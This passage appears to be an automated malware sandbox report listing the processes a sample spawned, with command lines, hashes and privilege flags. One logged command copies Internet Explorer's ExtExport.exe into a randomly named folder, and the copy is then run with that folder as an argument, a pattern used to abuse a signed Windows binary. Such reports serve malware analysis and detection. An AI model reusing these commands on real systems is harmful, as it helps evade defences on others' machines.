                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:00:06:27
                                                                                                                                                            Start date:11/06/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:00:06:27
                                                                                                                                                            Start date:11/06/2021
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:00:06:29
                                                                                                                                                            Start date:11/06/2021
                                                                                                                                                            Path:C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
                                                                                                                                                            Imagebase:0xc00000
                                                                                                                                                            File size:44544 bytes
                                                                                                                                                            MD5 hash:CE639EB63B7C1C1EC94651B65CCEC383
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, Metadefender, Browse
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >